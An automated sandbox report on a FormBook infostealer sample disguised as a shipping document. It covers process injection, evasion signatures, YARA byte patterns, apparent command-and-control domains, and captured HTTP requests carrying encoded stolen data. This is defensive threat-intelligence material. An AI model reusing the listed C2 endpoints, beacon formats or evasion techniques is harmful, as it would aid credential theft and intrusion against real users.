Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Final Shipping Document.exe

Overview

General Information

Sample name:Final Shipping Document.exe
Analysis ID:1483158
MD5:2d3ecaf3008e1d47782f668f713b35b1
SHA1:35ea8d6a9836384c69829e1a87ddb08c1f647fc7
SHA256:c2c3f4d25be2c10f834a4804172d58ee35adc35accd66227d7d89d9ae978e04d
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Final Shipping Document.exe (PID: 4568 cmdline: "C:\Users\user\Desktop\Final Shipping Document.exe" MD5: 2D3ECAF3008E1D47782F668F713B35B1)
    • svchost.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\Final Shipping Document.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QnAcfZuONg.exe (PID: 7100 cmdline: "C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • gpupdate.exe (PID: 6752 cmdline: "C:\Windows\SysWOW64\gpupdate.exe" MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)
          • QnAcfZuONg.exe (PID: 7156 cmdline: "C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6692 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x590df:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x41b2e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b930:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1437f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x169d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x177d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine|base64offset|contains: J), Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Final Shipping Document.exe, ParentProcessId: 4568, ParentProcessName: Final Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ProcessId: 3220, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", CommandLine|base64offset|contains: J), Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Final Shipping Document.exe, ParentProcessId: 4568, ParentProcessName: Final Shipping Document.exe, ProcessCommandLine: "C:\Users\user\Desktop\Final Shipping Document.exe", ProcessId: 3220, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-26T18:45:24.949358+0200
            SID:2022930
            Source Port:443
            Destination Port:55136
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T18:45:27.280649+0200
            SID:2022930
            Source Port:443
            Destination Port:55137
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T18:45:15.652468+0200
            SID:2022930
            Source Port:443
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA==Avira URL Cloud: Label: malware
            Source: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVDAvira URL Cloud: Label: malware
            Source: http://www.9muyiutyt.online/39t8/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Final Shipping Document.exeReversingLabs: Detection: 63%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Final Shipping Document.exeJoe Sandbox ML: detected
            Source: Final Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: gpupdate.pdb source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gpupdate.pdbGCTL source: svchost.exe, 00000002.00000002.2369677199.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337564698.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000002.3889291851.0000000000E18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QnAcfZuONg.exe, 00000004.00000002.3888447238.00000000001AE000.00000002.00000001.01000000.00000005.sdmp, QnAcfZuONg.exe, 00000007.00000002.3888452775.00000000001AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Final Shipping Document.exe, 00000000.00000003.2037587042.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Final Shipping Document.exe, 00000000.00000003.2037285310.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2370090803.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157508519.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2370090803.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2150327678.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, gpupdate.exe, 00000005.00000003.2376668262.0000000004CDF000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000003.2369961952.0000000004B22000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.000000000502E000.00000040.00001000.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3890618896.0000000004E90000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, gpupdate.exe, 00000005.00000002.3891568008.00000000054BC000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2778259246.000000003C12C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C0DBBE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BDC2A2 FindFirstFileExW,0_2_00BDC2A2
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C168EE FindFirstFileW,FindClose,0_2_00C168EE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C1698F
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D076
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D3A9
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C19642
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C1979D
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C19B2B
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C15C97
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D9C390 FindFirstFileW,FindNextFileW,FindClose,5_2_02D9C390
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 4x nop then xor eax, eax5_2_02D89B70
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 4x nop then mov ebx, 00000004h5_2_04D604E8

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.pqnqxn.xyz
            Source: DNS query: www.gridban.xyz
            Source: Joe Sandbox ViewIP Address: 178.212.35.248 178.212.35.248
            Source: Joe Sandbox ViewIP Address: 104.21.59.240 104.21.59.240
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C1CE44
            Source: global trafficHTTP traffic detected: GET /hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.toppersbusiness.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.rajveena.onlineUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.pqnqxn.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.lovezi.shopUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.artfulfusionhub.latUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.9muyiutyt.onlineUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.suntextmeetings.onlineUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.gridban.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.toppersbusiness.net
            Source: global trafficDNS traffic detected: DNS query: www.rajveena.online
            Source: global trafficDNS traffic detected: DNS query: www.76716e97778bac2e.com
            Source: global trafficDNS traffic detected: DNS query: www.pqnqxn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lovezi.shop
            Source: global trafficDNS traffic detected: DNS query: www.artfulfusionhub.lat
            Source: global trafficDNS traffic detected: DNS query: www.9muyiutyt.online
            Source: global trafficDNS traffic detected: DNS query: www.suntextmeetings.online
            Source: global trafficDNS traffic detected: DNS query: www.gridban.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xawcfzcql9tcvj.shop
            Source: unknownHTTP traffic detected: POST /wptv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204Host: www.rajveena.onlineOrigin: http://www.rajveena.onlineReferer: http://www.rajveena.online/wptv/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 43 66 35 61 72 69 61 39 6b 4a 6c 54 6c 4e 4d 7a 4f 45 4a 32 67 5a 6d 69 35 7a 75 50 61 78 68 38 32 59 2f 6a 6f 76 47 75 67 63 6d 54 75 41 46 5a 45 50 66 59 47 41 62 39 76 4e 66 74 33 30 7a 62 53 36 72 32 54 61 49 48 45 73 6d 49 55 72 70 2b 55 62 2b 34 56 48 6e 38 33 64 4f 6c 5a 54 32 52 72 65 41 6f 47 72 62 6a 6d 36 58 75 67 4a 59 57 51 36 31 79 52 73 69 62 4d 58 37 69 46 72 51 6a 2b 48 4d 6b 38 54 49 77 68 4e 36 45 70 41 55 4c 73 51 31 50 55 4a 51 63 30 38 34 72 62 56 68 7a 47 76 42 73 43 55 64 4b 54 63 66 74 4f 68 6f 41 51 63 74 66 72 74 4e 47 5a 4d 41 3d Data Ascii: 1Hg=ZDyye/AZ2xXJCf5aria9kJlTlNMzOEJ2gZmi5zuPaxh82Y/jovGugcmTuAFZEPfYGAb9vNft30zbS6r2TaIHEsmIUrp+Ub+4VHn83dOlZT2RreAoGrbjm6XugJYWQ61yRsibMX7iFrQj+HMk8TIwhN6EpAULsQ1PUJQc084rbVhzGvBsCUdKTcftOhoAQctfrtNGZMA=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 26 Jul 2024 16:45:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 